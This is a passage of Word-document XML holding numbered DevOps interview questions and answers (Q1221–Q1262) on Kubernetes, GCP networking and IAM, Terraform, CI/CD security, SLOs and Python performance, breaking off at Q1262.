    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A list is ordered and mutable, a tuple is ordered and immutable, a set stores unique unordered values, and a dictionary stores key-value pairs. Lists are useful for sequences, tuples for fixed records, sets for membership checks, and dictionaries for structured mappings. Choosing the right type improves readability and performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1222. Explain Python virtual environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A virtual environment isolates Python dependencies for a project so packages do not conflict with system Python or other projects. It helps make builds reproducible and easier to debug. In CI/CD, virtual environments or container images should be used consistently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1223. Scenario: A Kubernetes deployment keeps failing only during peak traffic. What would you investigate?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check resource saturation, autoscaling behavior, startup time, readiness probes, connection pools, database limits, queue depth, rate limits, and downstream latency. Compare peak and normal metrics to identify the bottleneck. Fixes may include pre-scaling, tuning HPA, improving caching, increasing dependency capacity, or adding backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1224. How do you design a zero-downtime Kubernetes deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use rolling updates, readiness probes, graceful shutdown, preStop hooks, proper termination grace period, and backward-compatible application changes. Ensure database migrations are expand-and-contract instead of breaking old versions. Add canary or blue-green deployment for high-risk changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1225. Scenario: A database migration breaks the new application version. How should deployment be designed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use backward-compatible migrations, deploy schema changes before application code, and avoid destructive changes until all old versions are gone. A safe pattern is expand, migrate data, switch application, then contract. Rollback planning should include both application rollback and data compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1226. What are Kubernetes PodDisruptionBudgets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: PodDisruptionBudgets define how many replicas of an application must remain available during voluntary disruptions such as node upgrades or drains. They protect availability but can also block maintenance if configured too strictly. They should match the application's real redundancy and SLO requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1227. Scenario: Node upgrades are stuck in GKE. What could be causing it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Strict PodDisruptionBudgets, pods without enough replicas, local storage, unmanaged workloads, or scheduling constraints can block node drains. Check events, disruption budgets, and pods remaining on the node. Fix by adjusting budgets, scaling replicas, or safely relaxing constraints during the maintenance window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1228. What is a Kubernetes NetworkPolicy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A NetworkPolicy controls allowed ingress and egress traffic for selected pods. It is used for segmentation, least privilege, and reducing lateral movement. Policies require a network plugin that enforces them, and default-deny policies are common in secure clusters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1229. Scenario: A service cannot connect to another namespace after enabling NetworkPolicy. What do you check?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check whether default-deny policy is active and whether ingress and egress rules both allow the traffic. Verify namespace selectors, pod selectors, ports, protocols, and DNS access. Also confirm the CNI plugin supports NetworkPolicy enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1230. How does Kubernetes DNS work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Kubernetes DNS resolves Service names to cluster IPs and pod DNS records where configured. A pod can usually reach a service using short names in the same namespace or fully qualified names like `service.namespace.svc.cluster.local`. DNS issues can come from CoreDNS failures, NetworkPolicy, node DNS configuration, or overloaded DNS pods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1231. What are common GCP networking components?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Important GCP networking components include VPCs, subnets, firewall rules, routes, Cloud NAT, Cloud Router, VPN, Interconnect, Private Service Connect, internal load balancers, and external load balancers. In GKE, alias IP ranges and secondary ranges are also important. Good design separates environments, limits exposure, and plans IP ranges carefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1232. Scenario: GKE pods cannot reach the internet from private nodes. What do you check?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check Cloud NAT configuration, routes, subnet association, firewall rules, DNS, and whether private Google access is needed for Google APIs. Private nodes do not have public IPs, so outbound internet usually requires Cloud NAT. Also verify organization policies are not blocking egress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1233. What is VPC Service Controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: VPC Service Controls creates security perimeters around supported Google Cloud services to reduce data exfiltration risk. It can restrict access based on project, network, identity, and context. It is powerful but can break workloads if service access patterns are not mapped carefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1234. Scenario: A data pipeline fails after enabling VPC Service Controls. How would you debug?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Review audit logs for perimeter violations and identify source project, identity, target service, and API method. Check whether required projects and services are inside the same perimeter or need access levels/bridges. Fix the perimeter rules carefully and retest with the exact service account used by the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1235. How do you use Cloud Logging and Cloud Monitoring effectively?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Collect structured logs, define useful metrics, create alert policies based on user impact, and build dashboards around SLOs. Avoid alerting on every warning; alert on symptoms that require action. Use labels such as service, environment, namespace, and version to make debugging faster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1236. Scenario: Your alert fires but users are not affected. What should you do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Treat it as an alert quality issue and review whether the alert is based on symptoms or internal noise. Tune thresholds, add duration windows, route low-priority signals to tickets, and connect alerts to runbooks. The goal is fewer, better alerts that improve response without causing fatigue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1237. What is an SLO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An SLO is a target level of reliability for a service, such as 99.9 percent successful requests over 30 days. It is based on service level indicators like availability, latency, or correctness. SLOs help teams balance reliability work against feature delivery using error budgets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1238. Scenario: Error budget is almost exhausted. What actions would you recommend?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Slow or freeze risky releases, focus engineering time on reliability fixes, review recent incidents, and improve observability and rollback speed. Prioritize work based on user impact and the biggest sources of error budget burn. Communicate clearly with product and leadership about the tradeoff between speed and reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1239. How do you secure a CI/CD pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use least-privilege credentials, short-lived tokens, protected branches, required reviews, signed artifacts, dependency scanning, secret scanning, and deployment approvals for sensitive environments. Build images from trusted bases and store artifacts in controlled registries. Audit every production deployment and make rollback easy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1240. Scenario: A secret was accidentally committed to Git. What should you do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Immediately revoke and rotate the secret, then assess where it was used and whether it was accessed. Remove it from active branches and history where appropriate, but rotation is the urgent control because Git history may already be copied. Add secret scanning and pre-commit or CI checks to prevent recurrence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1241. How do you implement GitOps for Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Store desired Kubernetes manifests or Helm/Kustomize configuration in Git and use a controller such as Argo CD or Flux to reconcile clusters to that state. Changes go through pull requests, review, policy checks, and automated sync. Git becomes the audit trail and rollback mechanism for cluster configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1242. Scenario: Argo CD shows OutOfSync but applying manually works. What could be wrong?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check generated manifests, Helm values, Kustomize overlays, ignored differences, admission webhooks, resource defaults, and fields mutated by controllers. Manual apply may use different inputs than Argo CD. The fix is to make Git match the real desired state or configure diff behavior for known controller-managed fields.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1243. What is the role of admission controllers in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Admission controllers validate or mutate API requests before objects are persisted. They can enforce security, defaults, quotas, image policies, labels, and compliance rules. Examples include Pod Security Admission, validating webhooks, mutating webhooks, and policy engines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1244. Scenario: A new policy blocks deployments in production. How do you handle it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Identify the exact policy violation and determine whether the workload or policy is wrong. If the policy is valid, fix manifests and update templates so future deployments comply. If the policy caused an unintended outage risk, use a controlled exception process with time-bound approval and follow-up remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1245. How do you design IAM in GCP for least privilege?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Grant roles at the smallest practical scope, prefer predefined or custom roles over broad owner/editor roles, and use service accounts per workload. Avoid long-lived keys by using Workload Identity, workload identity federation, or short-lived credentials. Review IAM regularly and monitor audit logs for suspicious access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1246. Scenario: A service account has Owner role in production. What is your remediation plan?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First identify what permissions the workload actually uses through logs, policy analysis, and documentation. Replace Owner with least-privilege roles, test in lower environments, then roll out with monitoring. Add guardrails such as organization policy, IAM review, and CI checks to prevent broad roles from returning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1247. What are Terraform provider version constraints?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Provider version constraints control which provider versions Terraform may install. Pinning versions prevents unexpected behavior from provider changes. Teams should use lock files, review upgrades deliberately, and test module compatibility before applying to production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1248. Scenario: A Terraform provider upgrade changes many resources. What should you do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Read the provider changelog, inspect the plan carefully, and test in a nonproduction environment first. Separate provider upgrades from feature changes to reduce risk. Use state migrations, moved blocks, or module updates where needed, and avoid applying large unclear plans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1249. How do you test Terraform code?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use `terraform fmt`, `terraform validate`, static analysis, policy checks, module unit tests, and integration tests in temporary environments where practical. Also review plans in CI before apply. Testing should catch syntax errors, security issues, naming mistakes, and destructive changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1250. Scenario: Terraform state lock is stuck. How do you resolve it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First confirm no apply is currently running. Then inspect who holds the lock and why it is stuck. Only after verifying it is safe, release the lock using the backend's supported mechanism, then rerun plan to ensure state is consistent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1251. How do you build a Python tool to clean old GCP resources safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: List candidate resources with filters, labels, age, and ownership metadata, then run in dry-run mode by default. Add allowlists, confirmations, audit logs, retries, and deletion batching. For production safety, require labels and approvals before deleting anything.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1252. Scenario: A cleanup script deleted a needed resource. How do you prevent recurrence?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Restore from backup or recreate the resource first, then perform root-cause analysis. Add dry-run defaults, deletion protection, label validation, allowlists, tests, peer review, and staged rollout. High-risk cleanup should have clear ownership and audit trails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1253. How do you parse large log files efficiently in Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Stream the file line by line instead of loading it fully into memory. Use generators, compiled regular expressions where needed, and structured parsers for JSON logs. For very large datasets, consider tools such as BigQuery, Dataflow, or distributed processing instead of a single script.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1254. Scenario: A Python service has high memory usage in Kubernetes. What would you check?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check object growth, caches, batch sizes, worker count, memory leaks, dependency behavior, and whether requests/limits match actual usage. Use profiling tools, heap snapshots, metrics, and container OOM events. Fixes may include streaming data, limiting concurrency, clearing caches, or increasing memory only after understanding the cause.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1255. What is async programming in Python useful for?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Async programming is useful for I/O-bound work such as API calls, network operations, and concurrent waiting. It can improve throughput without creating many threads. It does not automatically speed up CPU-bound work, where multiprocessing or optimized libraries may be better.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1256. Scenario: An API automation tool is slow because it calls 500 endpoints sequentially. How would you improve it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use controlled concurrency with async I/O or a thread pool, while respecting rate limits and retries. Add batching or caching if the API supports it. Measure before and after so the improvement is real and does not overload the dependency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1257. How do you approach incident response for cloud-native systems?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start with impact assessment and mitigation, then investigate using metrics, logs, traces, recent changes, and dependency health. Communicate status clearly, escalate when needed, and keep a timeline. After recovery, run a blameless review and convert findings into preventive actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1258. Scenario: Latency increases after moving to a new GCP region. What do you check?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check user location, load balancer routing, database location, cross-region calls, egress paths, DNS, CDN/cache behavior, and dependency regions. Latency often comes from hidden cross-region dependencies. Fix by colocating services and data, using global load balancing correctly, or redesigning for regional locality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1259. How do you design disaster recovery for GCP workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define RTO and RPO first, then choose backup, replication, failover, and restore strategies based on business needs. Test recovery regularly instead of only documenting it. Include application state, databases, secrets, DNS, IAM, infrastructure code, and operational runbooks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1260. Scenario: A regional outage affects your GKE application. What should your architecture support?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A resilient architecture should support multi-zone or multi-region deployment, health-based traffic routing, replicated data, automated failover, and tested runbooks. If active-active is too complex, active-passive with clear RTO/RPO may be acceptable. The answer should explain tradeoffs between cost, consistency, complexity, and recovery speed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1261. How do you optimize Kubernetes cost without hurting reliability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Right-size requests, use autoscaling, choose suitable machine types, remove idle workloads, optimize logging, use spot/preemptible nodes for fault-tolerant jobs, and separate critical from batch workloads. Keep enough headroom for reliability and scale-out delay. Cost optimization should be guided by metrics, not guesswork.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1262. Scenario: Batch jobs are starving production services in the same cluster. What would you do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
